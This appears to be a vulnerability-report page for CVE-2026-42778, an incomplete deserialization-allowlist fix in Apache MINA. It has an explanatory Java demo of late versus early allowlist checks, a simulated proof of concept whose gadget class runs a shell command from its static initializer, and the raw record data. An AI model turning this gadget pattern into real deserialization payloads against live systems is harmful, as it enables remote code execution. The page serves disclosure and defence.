Security Vulnerability Report
CVE-2026-42778 CVSS 9.8 CRITICAL

CVE-2026-42778

Published: 2026-05-01 11:16:19
Last Modified: 2026-05-01 17:55:49

Description

The fix for CVE-2026-41409 was not applied to the 2.1.X and 2.2.X branches. The original issue description was:

The fix for CVE-2024-52046 in Apache MINA AbstractIoBuffer.getObject() was incomplete. The classname allowlist of classes allowed to be deserialized was applied too late, after a static initializer of a class named in the stream might already have been executed.

Affected versions are Apache MINA 2.1.0 through 2.1.11, and 2.2.0 through 2.2.6.

The problem is resolved in Apache MINA 2.1.12 and 2.2.7 by applying the classname allowlist earlier.

Affected are applications using Apache MINA that call IoBuffer.getObject().

Applications using Apache MINA are advised to upgrade.

In practical terms, the exposure is any code path that hands attacker-controlled bytes to IoBuffer.getObject(): an allowlist that is only consulted once the class has been loaded and initialized cannot stop that class's static initializer from running, so the check has to be made on the class name taken from the stream descriptor, before the class is resolved.
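The ordering problem the description refers to can be reproduced outside MINA with a plain ObjectInputStream subclass. The following is an added example written for this page; it is not Apache MINA's code and does not reproduce MINA's actual AbstractIoBuffer.getObject() implementation. The class and stream names, the allowlist contents, the Probe class and the hand-built serialization stream are all constructed for the demonstration, and Class.forName with initialize=true stands in for "the allowlist is applied after the class has been initialized". Two resolveClass implementations are compared: one that resolves and initializes the class first and checks the allowlist afterwards, and one that rejects on the descriptor name before any class loading happens. Requires Java 9 or later (Set.of).

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.DataOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.io.InvalidClassException;
import java.io.ObjectInputStream;
import java.io.ObjectStreamClass;
import java.io.ObjectStreamConstants;
import java.io.Serializable;
import java.util.Set;

public class AllowlistOrderDemo {

    // Set by Probe's static initializer so main() can observe whether <clinit> ran.
    static volatile boolean probeInitialized = false;

    // Constructed stand-in for a gadget class (hypothetical, not a MINA class).
    // It is never referenced by name from main(), so the only way it can be
    // initialized in this JVM is through deserialization.
    static final class Probe implements Serializable {
        private static final long serialVersionUID = 1L;
        static {
            probeInitialized = true; // a real gadget would run attacker logic here
        }
    }

    static final String PROBE_NAME = AllowlistOrderDemo.class.getName() + "$Probe";

    // Hypothetical allowlist; Probe is deliberately absent.
    static final Set<String> ALLOWED = Set.of("java.lang.String", "java.lang.Integer");

    // Vulnerable ordering: the class is resolved and initialized first, and the
    // allowlist is consulted afterwards, so the rejection arrives too late.
    static final class LateCheckStream extends ObjectInputStream {
        LateCheckStream(InputStream in) throws IOException { super(in); }

        @Override
        protected Class<?> resolveClass(ObjectStreamClass desc)
                throws IOException, ClassNotFoundException {
            Class<?> cl = Class.forName(desc.getName(), true,
                                        AllowlistOrderDemo.class.getClassLoader());
            if (!ALLOWED.contains(cl.getName())) {
                throw new InvalidClassException(cl.getName(), "not in allowlist");
            }
            return cl;
        }
    }

    // Hardened ordering: decide on the class name taken from the stream
    // descriptor before any class loading happens.
    static final class EarlyCheckStream extends ObjectInputStream {
        EarlyCheckStream(InputStream in) throws IOException { super(in); }

        @Override
        protected Class<?> resolveClass(ObjectStreamClass desc)
                throws IOException, ClassNotFoundException {
            String name = desc.getName();
            if (!ALLOWED.contains(name)) {
                throw new InvalidClassException(name, "not in allowlist");
            }
            return super.resolveClass(desc); // default loads with initialize=false
        }
    }

    // Builds by hand a minimal serialization stream describing one instance of a
    // field-less Serializable class, so the class is never instantiated (and so
    // never initialized) on the sending side of this single-JVM demo.
    static byte[] craftStream(String className, long suid) throws IOException {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        DataOutputStream out = new DataOutputStream(bos);
        out.writeShort(ObjectStreamConstants.STREAM_MAGIC);
        out.writeShort(ObjectStreamConstants.STREAM_VERSION);
        out.writeByte(ObjectStreamConstants.TC_OBJECT);
        out.writeByte(ObjectStreamConstants.TC_CLASSDESC);
        out.writeUTF(className);
        out.writeLong(suid);
        out.writeByte(ObjectStreamConstants.SC_SERIALIZABLE);
        out.writeShort(0);                                   // no fields
        out.writeByte(ObjectStreamConstants.TC_ENDBLOCKDATA); // end of class annotation
        out.writeByte(ObjectStreamConstants.TC_NULL);         // no superclass descriptor
        out.flush();
        return bos.toByteArray();
    }

    // Reads one object from the stream and reports whether Probe got initialized.
    static boolean readAndReport(String label, ObjectInputStream in) throws IOException {
        try {
            in.readObject();
            System.out.println(label + ": object accepted (should not happen)");
        } catch (InvalidClassException e) {
            System.out.println(label + ": rejected (" + e.getMessage() + ")");
        } catch (ClassNotFoundException e) {
            System.out.println(label + ": class not found");
        }
        return probeInitialized;
    }

    public static void main(String[] args) throws IOException {
        byte[] payload = craftStream(PROBE_NAME, 1L);

        // Hardened stream first: Probe must still be uninitialized afterwards.
        boolean afterEarly = readAndReport("early check",
                new EarlyCheckStream(new ByteArrayInputStream(payload)));
        System.out.println("Probe initialized after early check? " + afterEarly);

        // Vulnerable ordering: the payload is rejected too, but only after <clinit> ran.
        boolean afterLate = readAndReport("late check",
                new LateCheckStream(new ByteArrayInputStream(payload)));
        System.out.println("Probe initialized after late check?  " + afterLate);
    }
}
```

Both streams reject the payload with the same InvalidClassException; the difference is that with the late check Probe's static initializer has already run by the time the exception is thrown, which is the whole of the vulnerability. On Java 9 and later the same decision can be delegated to the JDK via ObjectInputStream.setObjectInputFilter, which is also evaluated on the class name before any field data is read; either way, the allowlist must be applied before the class is initialized, not after.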

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:apache:mina:*:*:*:*:*:*:*:* - VULNERABLE (2.1.0 up to but excluding 2.1.12, i.e. Apache MINA 2.1.0 - 2.1.11)
cpe:2.3:a:apache:mina:*:*:*:*:*:*:*:* - VULNERABLE (2.2.0 up to but excluding 2.2.7, i.e. Apache MINA 2.2.0 - 2.2.6)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.io.Serializable;

// Mock malicious class simulating a gadget: its static initializer is the payload.
// Package-private so it can share one source file with Exploit (a file may
// contain only one public top-level class).
class MaliciousPayload implements Serializable {
    private static final long serialVersionUID = 1L;

    static {
        try {
            // This code runs before the allowlist check in vulnerable versions
            Runtime.getRuntime().exec("touch /tmp/pwned");
            System.out.println("[+] Exploit: Static initializer executed!");
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}

public class Exploit {
    public static void main(String[] args) throws Exception {
        // 1. Create malicious serialized data.
        //    In this single-JVM simulation the static block already fires here,
        //    when the class is first used; in a real attack the bytes arrive over
        //    the network and the victim JVM initializes the class while reading them.
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(bos);
        oos.writeObject(new MaliciousPayload());
        oos.close();
        byte[] data = bos.toByteArray();

        // 2. Simulate vulnerable IoBuffer.getObject() logic
        //    Vulnerability: deserialization happens before the allowlist check
        try {
            ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(data));
            Object obj = ois.readObject(); // Static block runs HERE (on first load of the class)
            // Allowlist check happens too late (after code execution)
            if (!obj.getClass().getName().equals("allowed.SafeClass")) {
                throw new SecurityException("Blocked by allowlist");
            }
        } catch (SecurityException e) {
            System.out.println("[-] Security check failed (but code already ran)");
        }
    }
}

References

https://lists.apache.org/thread/fhlx5k91hrkgyzh7yk1nghrn3k27gxy0 (Mailing List, Patch, Vendor Advisory)
Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-42778",
    "sourceIdentifier": "[email protected]",
    "published": "2026-05-01T11:16:19.383",
    "lastModified": "2026-05-01T17:55:49.277",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The fix for CVE-2026-41409 was not applied to the 2.1.X and 2.2.X branches. Here was the original issue description:\n\n\n\n\nThe fix for CVE-2024-52046 in Apache MINA AbstractIoBuffer.getObject() was incomplete. The classname allowlist of classes allowed to be deserialized was applied too late after a static initializer in a class to be read might already have been executed.\n\n\n\n\nAffected versions are Apache MINA 2.1.0 <= 2.1.11, and 2.2.0 <= 2.2.6.\n\n\n\n\nThe problem is resolved in Apache MINA 2.1.12, and 2.2.7 by \napplying the classname allowlist earlier.\n\n\n\n\nAffected are applications using Apache MINA that call IoBuffer.getObject().\n\n\n\n\nApplications using Apache MINA are advised to upgrade\n\n\n\n\n\n\nThe fix for CVE-2024-52046 in Apache MINA AbstractIoBuffer.getObject() was incomplete. The classname allowlist of classes allowed to be deserialized was applied too late after a static initializer in a class to be read might already have been executed.\n\n\n\n\nAffected versions are Apache MINA 2.1.0 <= 2.1.110, and 2.2.0 <= 2.2.6.\n\n\n\n\nThe problem is resolved in Apache MINA 2.1.12, and 2.2.7 by \napplying the classname allowlist earlier.\n\n\n\n\nAffected are applications using Apache MINA that call IoBuffer.getObject().\n\n\n\n\nApplications using Apache MINA are advised to upgrade"
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-502"
          }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:apache:mina:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "2.1.0",
                "versionEndExcluding": "2.1.12",
                "matchCriteriaId": "BD7E18F5-1CE6-4CD7-8A0D-BD0C2574FF12"
              },
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:apache:mina:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "2.2.0",
                "versionEndExcluding": "2.2.7",
                "matchCriteriaId": "758E989E-5CB0-471C-AADB-43EB3FB95407"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://lists.apache.org/thread/fhlx5k91hrkgyzh7yk1nghrn3k27gxy0",
        "source": "[email protected]",
        "tags": ["Mailing List", "Patch", "Vendor Advisory"]
      }
    ]
  }
}